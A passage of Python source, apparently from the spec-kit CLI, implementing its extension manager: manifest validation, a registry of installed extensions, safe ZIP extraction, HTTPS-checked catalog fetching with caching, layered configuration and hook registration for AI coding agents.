except yaml.YAMLError as e:
raise ValidationError(f"Invalid YAML in {path}: {e}")
except FileNotFoundError:
raise ValidationError(f"Manifest not found: {path}")
def _validate(self):
# Check required top-level fields
for field in self.REQUIRED_FIELDS:
if field not in self.data:
raise ValidationError(f"Missing required field: {field}")
# Validate schema version
if self.data["schema_version"] != self.SCHEMA_VERSION:
raise ValidationError(
f"Unsupported schema version: {self.data['schema_version']} "
f"(expected {self.SCHEMA_VERSION})"
)
# Validate extension metadata
ext = self.data["extension"]
for field in ["id", "name", "version", "description"]:
if field not in ext:
raise ValidationError(f"Missing extension.{field}")
# Validate extension ID format
if not re.match(r'^[a-z0-9-]+$', ext["id"]):
raise ValidationError(
f"Invalid extension ID '{ext['id']}': "
"must be lowercase alphanumeric with hyphens only"
)
# Validate semantic version
try:
pkg_version.Version(ext["version"])
except pkg_version.InvalidVersion:
raise ValidationError(f"Invalid version: {ext['version']}")
# Validate requires section
requires = self.data["requires"]
if "speckit_version" not in requires:
raise ValidationError("Missing requires.speckit_version")
# Validate provides section
provides = self.data["provides"]
if "commands" not in provides or not provides["commands"]:
raise ValidationError("Extension must provide at least one command")
# Validate commands
for cmd in provides["commands"]:
if "name" not in cmd or "file" not in cmd:
raise ValidationError("Command missing 'name' or 'file'")
# Validate command name format
if not re.match(r'^speckit\.[a-z0-9-]+\.[a-z0-9-]+$', cmd["name"]):
raise ValidationError(
f"Invalid command name '{cmd['name']}': "
"must follow pattern 'speckit.{extension}.{command}'"
)
@property
def id(self) -> str:
return self.data["extension"]["id"]
@property
def name(self) -> str:
return self.data["extension"]["name"]
@property
def version(self) -> str:
return self.data["extension"]["version"]
@property
def description(self) -> str:
return self.data["extension"]["description"]
@property
def requires_speckit_version(self) -> str:
return self.data["requires"]["speckit_version"]
@property
def commands(self) -> List[Dict[str, Any]]:
return self.data["provides"]["commands"]
@property
def hooks(self) -> Dict[str, Any]:
return self.data.get("hooks", {})
def get_hash(self) -> str:
with open(self.path, 'rb') as f:
return f"sha256:{hashlib.sha256(f.read()).hexdigest()}"
class ExtensionRegistry:
REGISTRY_FILE = ".registry"
SCHEMA_VERSION = "1.0"
def __init__(self, extensions_dir: Path):
self.extensions_dir = extensions_dir
self.registry_path = extensions_dir / self.REGISTRY_FILE
self.data = self._load()
def _load(self) -> dict:
if not self.registry_path.exists():
return {
"schema_version": self.SCHEMA_VERSION,
"extensions": {}
}
try:
with open(self.registry_path, 'r') as f:
return json.load(f)
except (json.JSONDecodeError, FileNotFoundError):
# Corrupted or missing registry, start fresh
return {
"schema_version": self.SCHEMA_VERSION,
"extensions": {}
}
def _save(self):
self.extensions_dir.mkdir(parents=True, exist_ok=True)
with open(self.registry_path, 'w') as f:
json.dump(self.data, f, indent=2)
def add(self, extension_id: str, metadata: dict):
self.data["extensions"][extension_id] = {
**metadata,
"installed_at": datetime.now(timezone.utc).isoformat()
}
self._save()
def update(self, extension_id: str, metadata: dict):
if extension_id not in self.data["extensions"]:
raise KeyError(f"Extension '{extension_id}' is not installed")
# Merge new metadata with existing, preserving original installed_at
existing = self.data["extensions"][extension_id]
# Handle corrupted registry entries (e.g., string/list instead of dict)
if not isinstance(existing, dict):
existing = {}
# Merge: existing fields preserved, new fields override
merged = {**existing, **metadata}
# Always preserve original installed_at based on key existence, not truthiness,
# to handle cases where the field exists but may be falsy (legacy/corruption)
if "installed_at" in existing:
merged["installed_at"] = existing["installed_at"]
else:
# If not present in existing, explicitly remove from merged if caller provided it
merged.pop("installed_at", None)
self.data["extensions"][extension_id] = merged
self._save()
def restore(self, extension_id: str, metadata: dict):
self.data["extensions"][extension_id] = dict(metadata)
self._save()
def remove(self, extension_id: str):
if extension_id in self.data["extensions"]:
del self.data["extensions"][extension_id]
self._save()
def get(self, extension_id: str) -> Optional[dict]:
entry = self.data["extensions"].get(extension_id)
return copy.deepcopy(entry) if entry is not None else None
def list(self) -> Dict[str, dict]:
return copy.deepcopy(self.data["extensions"])
def is_installed(self, extension_id: str) -> bool:
return extension_id in self.data["extensions"]
def list_by_priority(self) -> List[tuple]:
extensions = self.data.get("extensions", {}) or {}
if not isinstance(extensions, dict):
extensions = {}
sortable_extensions = []
for ext_id, meta in extensions.items():
if not isinstance(meta, dict):
continue
metadata_copy = copy.deepcopy(meta)
metadata_copy["priority"] = normalize_priority(metadata_copy.get("priority", 10))
sortable_extensions.append((ext_id, metadata_copy))
return sorted(
sortable_extensions,
key=lambda item: (item[1]["priority"], item[0]),
)
class ExtensionManager:
def __init__(self, project_root: Path):
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.registry = ExtensionRegistry(self.extensions_dir)
@staticmethod
def _load_extensionignore(source_dir: Path) -> Optional[Callable[[str, List[str]], Set[str]]]:
ignore_file = source_dir / ".extensionignore"
if not ignore_file.exists():
return None
lines: List[str] = ignore_file.read_text().splitlines()
# Normalise backslashes in patterns so Windows-authored files work
normalised: List[str] = []
for line in lines:
stripped = line.strip()
if stripped and not stripped.startswith("#"):
normalised.append(stripped.replace("\\", "/"))
else:
# Preserve blanks/comments so pathspec line numbers stay stable
normalised.append(line)
# Always ignore the .extensionignore file itself
normalised.append(".extensionignore")
spec = pathspec.GitIgnoreSpec.from_lines(normalised)
def _ignore(directory: str, entries: List[str]) -> Set[str]:
ignored: Set[str] = set()
rel_dir = Path(directory).relative_to(source_dir)
for entry in entries:
rel_path = str(rel_dir / entry) if str(rel_dir) != "." else entry
# Normalise to forward slashes for consistent matching
rel_path_fwd = rel_path.replace("\\", "/")
entry_full = Path(directory) / entry
if entry_full.is_dir():
# Append '/' so directory-only patterns (e.g. tests/) match
if spec.match_file(rel_path_fwd + "/"):
ignored.add(entry)
else:
if spec.match_file(rel_path_fwd):
ignored.add(entry)
return ignored
return _ignore
def check_compatibility(
self,
manifest: ExtensionManifest,
speckit_version: str
) -> bool:
required = manifest.requires_speckit_version
current = pkg_version.Version(speckit_version)
# Parse version specifier (e.g., ">=0.1.0,<2.0.0")
try:
specifier = SpecifierSet(required)
if current not in specifier:
raise CompatibilityError(
f"Extension requires spec-kit {required}, "
f"but {speckit_version} is installed.\n"
f"Upgrade spec-kit with: uv tool install specify-cli --force"
)
except InvalidSpecifier:
raise CompatibilityError(f"Invalid version specifier: {required}")
return True
def install_from_directory(
self,
source_dir: Path,
speckit_version: str,
register_commands: bool = True,
priority: int = 10,
) -> ExtensionManifest:
# Validate priority
if priority < 1:
raise ValidationError("Priority must be a positive integer (1 or higher)")
# Load and validate manifest
manifest_path = source_dir / "extension.yml"
manifest = ExtensionManifest(manifest_path)
# Check compatibility
self.check_compatibility(manifest, speckit_version)
# Check if already installed
if self.registry.is_installed(manifest.id):
raise ExtensionError(
f"Extension '{manifest.id}' is already installed. "
f"Use 'specify extension remove {manifest.id}' first."
)
# Install extension
dest_dir = self.extensions_dir / manifest.id
if dest_dir.exists():
shutil.rmtree(dest_dir)
ignore_fn = self._load_extensionignore(source_dir)
shutil.copytree(source_dir, dest_dir, ignore=ignore_fn)
# Register commands with AI agents
registered_commands = {}
if register_commands:
registrar = CommandRegistrar()
# Register for all detected agents
registered_commands = registrar.register_commands_for_all_agents(
manifest, dest_dir, self.project_root
)
# Register hooks
hook_executor = HookExecutor(self.project_root)
hook_executor.register_hooks(manifest)
# Update registry
self.registry.add(manifest.id, {
"version": manifest.version,
"source": "local",
"manifest_hash": manifest.get_hash(),
"enabled": True,
"priority": priority,
"registered_commands": registered_commands
})
return manifest
def install_from_zip(
self,
zip_path: Path,
speckit_version: str,
priority: int = 10,
) -> ExtensionManifest:
# Validate priority early
if priority < 1:
raise ValidationError("Priority must be a positive integer (1 or higher)")
with tempfile.TemporaryDirectory() as tmpdir:
temp_path = Path(tmpdir)
# Extract ZIP safely (prevent Zip Slip attack)
with zipfile.ZipFile(zip_path, 'r') as zf:
# Validate all paths first before extracting anything
temp_path_resolved = temp_path.resolve()
for member in zf.namelist():
member_path = (temp_path / member).resolve()
# Use is_relative_to for safe path containment check
try:
member_path.relative_to(temp_path_resolved)
except ValueError:
raise ValidationError(
f"Unsafe path in ZIP archive: {member} (potential path traversal)"
)
# Only extract after all paths are validated
zf.extractall(temp_path)
# Find extension directory (may be nested)
extension_dir = temp_path
manifest_path = extension_dir / "extension.yml"
# Check if manifest is in a subdirectory
if not manifest_path.exists():
subdirs = [d for d in temp_path.iterdir() if d.is_dir()]
if len(subdirs) == 1:
extension_dir = subdirs[0]
manifest_path = extension_dir / "extension.yml"
if not manifest_path.exists():
raise ValidationError("No extension.yml found in ZIP file")
# Install from extracted directory
return self.install_from_directory(extension_dir, speckit_version, priority=priority)
def remove(self, extension_id: str, keep_config: bool = False) -> bool:
if not self.registry.is_installed(extension_id):
return False
# Get registered commands before removal
metadata = self.registry.get(extension_id)
registered_commands = metadata.get("registered_commands", {})
extension_dir = self.extensions_dir / extension_id
# Unregister commands from all AI agents
if registered_commands:
registrar = CommandRegistrar()
registrar.unregister_commands(registered_commands, self.project_root)
if keep_config:
# Preserve config files, only remove non-config files
if extension_dir.exists():
for child in extension_dir.iterdir():
# Keep top-level *-config.yml and *-config.local.yml files
if child.is_file() and (
child.name.endswith("-config.yml") or
child.name.endswith("-config.local.yml")
):
continue
if child.is_dir():
shutil.rmtree(child)
else:
child.unlink()
else:
# Backup config files before deleting
if extension_dir.exists():
# Use subdirectory per extension to avoid name accumulation
# (e.g., jira-jira-config.yml on repeated remove/install cycles)
backup_dir = self.extensions_dir / ".backup" / extension_id
backup_dir.mkdir(parents=True, exist_ok=True)
# Backup both primary and local override config files
config_files = list(extension_dir.glob("*-config.yml")) + list(
extension_dir.glob("*-config.local.yml")
)
for config_file in config_files:
backup_path = backup_dir / config_file.name
shutil.copy2(config_file, backup_path)
# Remove extension directory
if extension_dir.exists():
shutil.rmtree(extension_dir)
# Unregister hooks
hook_executor = HookExecutor(self.project_root)
hook_executor.unregister_hooks(extension_id)
# Update registry
self.registry.remove(extension_id)
return True
def list_installed(self) -> List[Dict[str, Any]]:
result = []
for ext_id, metadata in self.registry.list().items():
# Ensure metadata is a dictionary to avoid AttributeError when using .get()
if not isinstance(metadata, dict):
metadata = {}
ext_dir = self.extensions_dir / ext_id
manifest_path = ext_dir / "extension.yml"
try:
manifest = ExtensionManifest(manifest_path)
result.append({
"id": ext_id,
"name": manifest.name,
"version": metadata.get("version", "unknown"),
"description": manifest.description,
"enabled": metadata.get("enabled", True),
"priority": normalize_priority(metadata.get("priority")),
"installed_at": metadata.get("installed_at"),
"command_count": len(manifest.commands),
"hook_count": len(manifest.hooks)
})
except ValidationError:
# Corrupted extension
result.append({
"id": ext_id,
"name": ext_id,
"version": metadata.get("version", "unknown"),
"description": "⚠️ Corrupted extension",
"enabled": False,
"priority": normalize_priority(metadata.get("priority")),
"installed_at": metadata.get("installed_at"),
"command_count": 0,
"hook_count": 0
})
return result
def get_extension(self, extension_id: str) -> Optional[ExtensionManifest]:
if not self.registry.is_installed(extension_id):
return None
ext_dir = self.extensions_dir / extension_id
manifest_path = ext_dir / "extension.yml"
try:
return ExtensionManifest(manifest_path)
except ValidationError:
return None
def version_satisfies(current: str, required: str) -> bool:
try:
current_ver = pkg_version.Version(current)
specifier = SpecifierSet(required)
return current_ver in specifier
except (pkg_version.InvalidVersion, InvalidSpecifier):
return False
class CommandRegistrar:
# Re-export AGENT_CONFIGS at class level for direct attribute access
from .agents import CommandRegistrar as _AgentRegistrar
AGENT_CONFIGS = _AgentRegistrar.AGENT_CONFIGS
def __init__(self):
from .agents import CommandRegistrar as _Registrar
self._registrar = _Registrar()
# Delegate static/utility methods
@staticmethod
def parse_frontmatter(content: str) -> tuple[dict, str]:
from .agents import CommandRegistrar as _Registrar
return _Registrar.parse_frontmatter(content)
@staticmethod
def render_frontmatter(fm: dict) -> str:
from .agents import CommandRegistrar as _Registrar
return _Registrar.render_frontmatter(fm)
@staticmethod
def _write_copilot_prompt(project_root, cmd_name: str) -> None:
from .agents import CommandRegistrar as _Registrar
_Registrar.write_copilot_prompt(project_root, cmd_name)
def _render_markdown_command(self, frontmatter, body, ext_id):
# Preserve extension-specific comment format for backward compatibility
context_note = f"\n<!-- Extension: {ext_id} -->\n<!-- Config: .specify/extensions/{ext_id}/ -->\n"
return self._registrar.render_frontmatter(frontmatter) + "\n" + context_note + body
def _render_toml_command(self, frontmatter, body, ext_id):
# Preserve extension-specific context comments for backward compatibility
base = self._registrar.render_toml_command(frontmatter, body, ext_id)
context_lines = f"# Extension: {ext_id}\n# Config: .specify/extensions/{ext_id}/\n"
return base.rstrip("\n") + "\n" + context_lines
def register_commands_for_agent(
self,
agent_name: str,
manifest: ExtensionManifest,
extension_dir: Path,
project_root: Path
) -> List[str]:
if agent_name not in self.AGENT_CONFIGS:
raise ExtensionError(f"Unsupported agent: {agent_name}")
context_note = f"\n<!-- Extension: {manifest.id} -->\n<!-- Config: .specify/extensions/{manifest.id}/ -->\n"
return self._registrar.register_commands(
agent_name, manifest.commands, manifest.id, extension_dir, project_root,
context_note=context_note
)
def register_commands_for_all_agents(
self,
manifest: ExtensionManifest,
extension_dir: Path,
project_root: Path
) -> Dict[str, List[str]]:
context_note = f"\n<!-- Extension: {manifest.id} -->\n<!-- Config: .specify/extensions/{manifest.id}/ -->\n"
return self._registrar.register_commands_for_all_agents(
manifest.commands, manifest.id, extension_dir, project_root,
context_note=context_note
)
def unregister_commands(
self,
registered_commands: Dict[str, List[str]],
project_root: Path
) -> None:
self._registrar.unregister_commands(registered_commands, project_root)
def register_commands_for_claude(
self,
manifest: ExtensionManifest,
extension_dir: Path,
project_root: Path
) -> List[str]:
return self.register_commands_for_agent("claude", manifest, extension_dir, project_root)
class ExtensionCatalog:
DEFAULT_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/extensions/catalog.json"
COMMUNITY_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/extensions/catalog.community.json"
CACHE_DURATION = 3600 # 1 hour in seconds
def __init__(self, project_root: Path):
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.cache_dir = self.extensions_dir / ".cache"
self.cache_file = self.cache_dir / "catalog.json"
self.cache_metadata_file = self.cache_dir / "catalog-metadata.json"
def _validate_catalog_url(self, url: str) -> None:
from urllib.parse import urlparse
parsed = urlparse(url)
is_localhost = parsed.hostname in ("localhost", "127.0.0.1", "::1")
if parsed.scheme != "https" and not (parsed.scheme == "http" and is_localhost):
raise ValidationError(
f"Catalog URL must use HTTPS (got {parsed.scheme}://). "
"HTTP is only allowed for localhost."
)
if not parsed.netloc:
raise ValidationError("Catalog URL must be a valid URL with a host.")
def _load_catalog_config(self, config_path: Path) -> Optional[List[CatalogEntry]]:
if not config_path.exists():
return None
try:
data = yaml.safe_load(config_path.read_text()) or {}
except (yaml.YAMLError, OSError) as e:
raise ValidationError(
f"Failed to read catalog config {config_path}: {e}"
)
catalogs_data = data.get("catalogs", [])
if not catalogs_data:
# File exists but has no catalogs key or empty list - fail closed
raise ValidationError(
f"Catalog config {config_path} exists but contains no 'catalogs' entries. "
f"Remove the file to use built-in defaults, or add valid catalog entries."
)
if not isinstance(catalogs_data, list):
raise ValidationError(
f"Invalid catalog config: 'catalogs' must be a list, got {type(catalogs_data).__name__}"
)
entries: List[CatalogEntry] = []
skipped_entries: List[int] = []
for idx, item in enumerate(catalogs_data):
if not isinstance(item, dict):
raise ValidationError(
f"Invalid catalog entry at index {idx}: expected a mapping, got {type(item).__name__}"
)
url = str(item.get("url", "")).strip()
if not url:
skipped_entries.append(idx)
continue
self._validate_catalog_url(url)
try:
priority = int(item.get("priority", idx + 1))
except (TypeError, ValueError):
raise ValidationError(
f"Invalid priority for catalog '{item.get('name', idx + 1)}': "
f"expected integer, got {item.get('priority')!r}"
)
raw_install = item.get("install_allowed", False)
if isinstance(raw_install, str):
install_allowed = raw_install.strip().lower() in ("true", "yes", "1")
else:
install_allowed = bool(raw_install)
entries.append(CatalogEntry(
url=url,
name=str(item.get("name", f"catalog-{idx + 1}")),
priority=priority,
install_allowed=install_allowed,
description=str(item.get("description", "")),
))
entries.sort(key=lambda e: e.priority)
if not entries:
# All entries were invalid (missing URLs) - fail closed for security
raise ValidationError(
f"Catalog config {config_path} contains {len(catalogs_data)} entries but none have valid URLs "
f"(entries at indices {skipped_entries} were skipped). "
f"Each catalog entry must have a 'url' field."
)
return entries
def get_active_catalogs(self) -> List[CatalogEntry]:
import sys
# 1. SPECKIT_CATALOG_URL env var replaces all defaults for backward compat
if env_value := os.environ.get("SPECKIT_CATALOG_URL"):
catalog_url = env_value.strip()
self._validate_catalog_url(catalog_url)
if catalog_url != self.DEFAULT_CATALOG_URL:
if not getattr(self, "_non_default_catalog_warning_shown", False):
print(
"Warning: Using non-default extension catalog. "
"Only use catalogs from sources you trust.",
file=sys.stderr,
)
self._non_default_catalog_warning_shown = True
return [CatalogEntry(url=catalog_url, name="custom", priority=1, install_allowed=True, description="Custom catalog via SPECKIT_CATALOG_URL")]
# 2. Project-level config overrides all defaults
project_config_path = self.project_root / ".specify" / "extension-catalogs.yml"
catalogs = self._load_catalog_config(project_config_path)
if catalogs is not None:
return catalogs
# 3. User-level config
user_config_path = Path.home() / ".specify" / "extension-catalogs.yml"
catalogs = self._load_catalog_config(user_config_path)
if catalogs is not None:
return catalogs
# 4. Built-in default stack
return [
CatalogEntry(url=self.DEFAULT_CATALOG_URL, name="default", priority=1, install_allowed=True, description="Built-in catalog of installable extensions"),
CatalogEntry(url=self.COMMUNITY_CATALOG_URL, name="community", priority=2, install_allowed=False, description="Community-contributed extensions (discovery only)"),
]
def get_catalog_url(self) -> str:
active = self.get_active_catalogs()
return active[0].url if active else self.DEFAULT_CATALOG_URL
def _fetch_single_catalog(self, entry: CatalogEntry, force_refresh: bool = False) -> Dict[str, Any]:
import urllib.request
import urllib.error
# Determine cache file paths (backward compat for default catalog)
if entry.url == self.DEFAULT_CATALOG_URL:
cache_file = self.cache_file
cache_meta_file = self.cache_metadata_file
is_valid = not force_refresh and self.is_cache_valid()
else:
url_hash = hashlib.sha256(entry.url.encode()).hexdigest()[:16]
cache_file = self.cache_dir / f"catalog-{url_hash}.json"
cache_meta_file = self.cache_dir / f"catalog-{url_hash}-metadata.json"
is_valid = False
if not force_refresh and cache_file.exists() and cache_meta_file.exists():
try:
metadata = json.loads(cache_meta_file.read_text())
cached_at = datetime.fromisoformat(metadata.get("cached_at", ""))
if cached_at.tzinfo is None:
cached_at = cached_at.replace(tzinfo=timezone.utc)
age = (datetime.now(timezone.utc) - cached_at).total_seconds()
is_valid = age < self.CACHE_DURATION
except (json.JSONDecodeError, ValueError, KeyError, TypeError):
# If metadata is invalid or missing expected fields, treat cache as invalid
pass
# Use cache if valid
if is_valid:
try:
return json.loads(cache_file.read_text())
except json.JSONDecodeError:
pass
# Fetch from network
try:
with urllib.request.urlopen(entry.url, timeout=10) as response:
catalog_data = json.loads(response.read())
if "schema_version" not in catalog_data or "extensions" not in catalog_data:
raise ExtensionError(f"Invalid catalog format from {entry.url}")
# Save to cache
self.cache_dir.mkdir(parents=True, exist_ok=True)
cache_file.write_text(json.dumps(catalog_data, indent=2))
cache_meta_file.write_text(json.dumps({
"cached_at": datetime.now(timezone.utc).isoformat(),
"catalog_url": entry.url,
}, indent=2))
return catalog_data
except urllib.error.URLError as e:
raise ExtensionError(f"Failed to fetch catalog from {entry.url}: {e}")
except json.JSONDecodeError as e:
raise ExtensionError(f"Invalid JSON in catalog from {entry.url}: {e}")
def _get_merged_extensions(self, force_refresh: bool = False) -> List[Dict[str, Any]]:
import sys
active_catalogs = self.get_active_catalogs()
merged: Dict[str, Dict[str, Any]] = {}
any_success = False
for catalog_entry in active_catalogs:
try:
catalog_data = self._fetch_single_catalog(catalog_entry, force_refresh)
any_success = True
except ExtensionError as e:
print(
f"Warning: Could not fetch catalog '{catalog_entry.name}': {e}",
file=sys.stderr,
)
continue
for ext_id, ext_data in catalog_data.get("extensions", {}).items():
if ext_id not in merged: # Higher-priority catalog wins
merged[ext_id] = {
**ext_data,
"id": ext_id,
"_catalog_name": catalog_entry.name,
"_install_allowed": catalog_entry.install_allowed,
}
if not any_success and active_catalogs:
raise ExtensionError("Failed to fetch any extension catalog")
return list(merged.values())
def is_cache_valid(self) -> bool:
if not self.cache_file.exists() or not self.cache_metadata_file.exists():
return False
try:
metadata = json.loads(self.cache_metadata_file.read_text())
cached_at = datetime.fromisoformat(metadata.get("cached_at", ""))
if cached_at.tzinfo is None:
cached_at = cached_at.replace(tzinfo=timezone.utc)
age_seconds = (datetime.now(timezone.utc) - cached_at).total_seconds()
return age_seconds < self.CACHE_DURATION
except (json.JSONDecodeError, ValueError, KeyError, TypeError):
return False
def fetch_catalog(self, force_refresh: bool = False) -> Dict[str, Any]:
# Check cache first unless force refresh
if not force_refresh and self.is_cache_valid():
try:
return json.loads(self.cache_file.read_text())
except json.JSONDecodeError:
pass # Fall through to network fetch
# Fetch from network
catalog_url = self.get_catalog_url()
try:
import urllib.request
import urllib.error
with urllib.request.urlopen(catalog_url, timeout=10) as response:
catalog_data = json.loads(response.read())
# Validate catalog structure
if "schema_version" not in catalog_data or "extensions" not in catalog_data:
raise ExtensionError("Invalid catalog format")
# Save to cache
self.cache_dir.mkdir(parents=True, exist_ok=True)
self.cache_file.write_text(json.dumps(catalog_data, indent=2))
# Save cache metadata
metadata = {
"cached_at": datetime.now(timezone.utc).isoformat(),
"catalog_url": catalog_url,
}
self.cache_metadata_file.write_text(json.dumps(metadata, indent=2))
return catalog_data
except urllib.error.URLError as e:
raise ExtensionError(f"Failed to fetch catalog from {catalog_url}: {e}")
except json.JSONDecodeError as e:
raise ExtensionError(f"Invalid JSON in catalog: {e}")
def search(
self,
query: Optional[str] = None,
tag: Optional[str] = None,
author: Optional[str] = None,
verified_only: bool = False,
) -> List[Dict[str, Any]]:
all_extensions = self._get_merged_extensions()
results = []
for ext_data in all_extensions:
ext_id = ext_data["id"]
# Apply filters
if verified_only and not ext_data.get("verified", False):
continue
if author and ext_data.get("author", "").lower() != author.lower():
continue
if tag and tag.lower() not in [t.lower() for t in ext_data.get("tags", [])]:
continue
if query:
# Search in name, description, and tags
query_lower = query.lower()
searchable_text = " ".join(
[
ext_data.get("name", ""),
ext_data.get("description", ""),
ext_id,
]
+ ext_data.get("tags", [])
).lower()
if query_lower not in searchable_text:
continue
results.append(ext_data)
return results
def get_extension_info(self, extension_id: str) -> Optional[Dict[str, Any]]:
all_extensions = self._get_merged_extensions()
for ext_data in all_extensions:
if ext_data["id"] == extension_id:
return ext_data
return None
def download_extension(self, extension_id: str, target_dir: Optional[Path] = None) -> Path:
import urllib.request
import urllib.error
# Get extension info from catalog
ext_info = self.get_extension_info(extension_id)
if not ext_info:
raise ExtensionError(f"Extension '{extension_id}' not found in catalog")
download_url = ext_info.get("download_url")
if not download_url:
raise ExtensionError(f"Extension '{extension_id}' has no download URL")
# Validate download URL requires HTTPS (prevent man-in-the-middle attacks)
from urllib.parse import urlparse
parsed = urlparse(download_url)
is_localhost = parsed.hostname in ("localhost", "127.0.0.1", "::1")
if parsed.scheme != "https" and not (parsed.scheme == "http" and is_localhost):
raise ExtensionError(
f"Extension download URL must use HTTPS: {download_url}"
)
# Determine target path
if target_dir is None:
target_dir = self.cache_dir / "downloads"
target_dir.mkdir(parents=True, exist_ok=True)
version = ext_info.get("version", "unknown")
zip_filename = f"{extension_id}-{version}.zip"
zip_path = target_dir / zip_filename
# Download the ZIP file
try:
with urllib.request.urlopen(download_url, timeout=60) as response:
zip_data = response.read()
zip_path.write_bytes(zip_data)
return zip_path
except urllib.error.URLError as e:
raise ExtensionError(f"Failed to download extension from {download_url}: {e}")
except IOError as e:
raise ExtensionError(f"Failed to save extension ZIP: {e}")
def clear_cache(self):
if self.cache_file.exists():
self.cache_file.unlink()
if self.cache_metadata_file.exists():
self.cache_metadata_file.unlink()
# Also clear any per-URL hash-based cache files
if self.cache_dir.exists():
for extra_cache in self.cache_dir.glob("catalog-*.json"):
if extra_cache != self.cache_file:
extra_cache.unlink(missing_ok=True)
for extra_meta in self.cache_dir.glob("catalog-*-metadata.json"):
extra_meta.unlink(missing_ok=True)
class ConfigManager:
def __init__(self, project_root: Path, extension_id: str):
self.project_root = project_root
self.extension_id = extension_id
self.extension_dir = project_root / ".specify" / "extensions" / extension_id
def _load_yaml_config(self, file_path: Path) -> Dict[str, Any]:
if not file_path.exists():
return {}
try:
return yaml.safe_load(file_path.read_text()) or {}
except (yaml.YAMLError, OSError):
return {}
def _get_extension_defaults(self) -> Dict[str, Any]:
manifest_path = self.extension_dir / "extension.yml"
if not manifest_path.exists():
return {}
manifest_data = self._load_yaml_config(manifest_path)
return manifest_data.get("config", {}).get("defaults", {})
def _get_project_config(self) -> Dict[str, Any]:
config_file = self.extension_dir / f"{self.extension_id}-config.yml"
return self._load_yaml_config(config_file)
def _get_local_config(self) -> Dict[str, Any]:
config_file = self.extension_dir / "local-config.yml"
return self._load_yaml_config(config_file)
def _get_env_config(self) -> Dict[str, Any]:
import os
env_config = {}
ext_id_upper = self.extension_id.replace("-", "_").upper()
prefix = f"SPECKIT_{ext_id_upper}_"
for key, value in os.environ.items():
if not key.startswith(prefix):
continue
# Remove prefix and split into parts
config_path = key[len(prefix):].lower().split("_")
# Build nested dict
current = env_config
for part in config_path[:-1]:
if part not in current:
current[part] = {}
current = current[part]
# Set the final value
current[config_path[-1]] = value
return env_config
def _merge_configs(self, base: Dict[str, Any], override: Dict[str, Any]) -> Dict[str, Any]:
result = base.copy()
for key, value in override.items():
if key in result and isinstance(result[key], dict) and isinstance(value, dict):
# Recursive merge for nested dicts
result[key] = self._merge_configs(result[key], value)
else:
# Override value
result[key] = value
return result
def get_config(self) -> Dict[str, Any]:
# Start with defaults
config = self._get_extension_defaults()
# Merge project config
config = self._merge_configs(config, self._get_project_config())
# Merge local config
config = self._merge_configs(config, self._get_local_config())
# Merge environment config
config = self._merge_configs(config, self._get_env_config())
return config
def get_value(self, key_path: str, default: Any = None) -> Any:
config = self.get_config()
keys = key_path.split(".")
current = config
for key in keys:
if not isinstance(current, dict) or key not in current:
return default
current = current[key]
return current
def has_value(self, key_path: str) -> bool:
config = self.get_config()
keys = key_path.split(".")
current = config
for key in keys:
if not isinstance(current, dict) or key not in current:
return False
current = current[key]
return True
class HookExecutor:
def __init__(self, project_root: Path):
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.config_file = project_root / ".specify" / "extensions.yml"
def get_project_config(self) -> Dict[str, Any]:
if not self.config_file.exists():
return {
"installed": [],
"settings": {"auto_execute_hooks": True},
"hooks": {},
}
try:
return yaml.safe_load(self.config_file.read_text()) or {}
except (yaml.YAMLError, OSError):
return {
"installed": [],
"settings": {"auto_execute_hooks": True},
"hooks": {},
}
def save_project_config(self, config: Dict[str, Any]):
self.config_file.parent.mkdir(parents=True, exist_ok=True)
self.config_file.write_text(
yaml.dump(config, default_flow_style=False, sort_keys=False)
)
def register_hooks(self, manifest: ExtensionManifest):
if not hasattr(manifest, "hooks") or not manifest.hooks:
return
config = self.get_project_config()
# Ensure hooks dict exists
if "hooks" not in config:
config["hooks"] = {}
# Register each hook
for hook_name, hook_config in manifest.hooks.items():
if hook_name not in config["hooks"]:
config["hooks"][hook_name] = []
# Add hook entry
hook_entry = {
"extension": manifest.id,
"command": hook_config.get("command"),
"enabled": True,
"optional": hook_config.get("optional", True),
"prompt": hook_config.get(
"prompt", f"Execute {hook_config.get('command')}?"
),
"description": hook_config.get("description", ""),
"condition": hook_config.get("condition"),
}
# Check if already registered
existing = [
h
for h in config["hooks"][hook_name]
if h.get("extension") == manifest.id
]
if not existing:
config["hooks"][hook_name].append(hook_entry)
else:
# Update existing
for i, h in enumerate(config["hooks"][hook_name]):
if h.get("extension") == manifest.id:
config["hooks"][hook_name][i] = hook_entry
self.save_project_config(config)
def unregister_hooks(self, extension_id: str):
config = self.get_project_config()
if "hooks" not in config:
return
# Remove hooks for this extension
for hook_name in config["hooks"]:
config["hooks"][hook_name] = [
h
for h in config["hooks"][hook_name]
if h.get("extension") != extension_id
]
# Clean up empty hook arrays
config["hooks"] = {
name: hooks for name, hooks in config["hooks"].items() if hooks
}
self.save_project_config(config)
def get_hooks_for_event(self, event_name: str) -> List[Dict[str, Any]]:
config = self.get_project_config()
hooks = config.get("hooks", {}).get(event_name, [])
# Filter to enabled hooks only
return [h for h in hooks if h.get("enabled", True)]
def should_execute_hook(self, hook: Dict[str, Any]) -> bool:
condition = hook.get("condition")
if not condition:
return True
# Parse and evaluate condition
try:
return self._evaluate_condition(condition, hook.get("extension"))
except Exception:
# If condition evaluation fails, default to not executing
return False
def _evaluate_condition(self, condition: str, extension_id: Optional[str]) -> bool:
import os
condition = condition.strip()
# Pattern: "config.key.path is set"
if match := re.match(r'config\.([a-z0-9_.]+)\s+is\s+set', condition, re.IGNORECASE):
key_path = match.group(1)
if not extension_id:
return False
config_manager = ConfigManager(self.project_root, extension_id)
return config_manager.has_value(key_path)
# Pattern: "config.key.path == 'value'" or "config.key.path != 'value'"
if match := re.match(r'config\.([a-z0-9_.]+)\s*(==|!=)\s*["\']([^"\']+)["\']', condition, re.IGNORECASE):
key_path = match.group(1)
operator = match.group(2)
expected_value = match.group(3)
if not extension_id:
return False
config_manager = ConfigManager(self.project_root, extension_id)
actual_value = config_manager.get_value(key_path)
# Normalize boolean values to lowercase for comparison
# (YAML True/False vs condition strings 'true'/'false')
if isinstance(actual_value, bool):
normalized_value = "true" if actual_value else "false"
else:
normalized_value = str(actual_value)
if operator == "==":
return normalized_value == expected_value
else: # !=
return normalized_value != expected_value
# Pattern: "env.VAR_NAME is set"
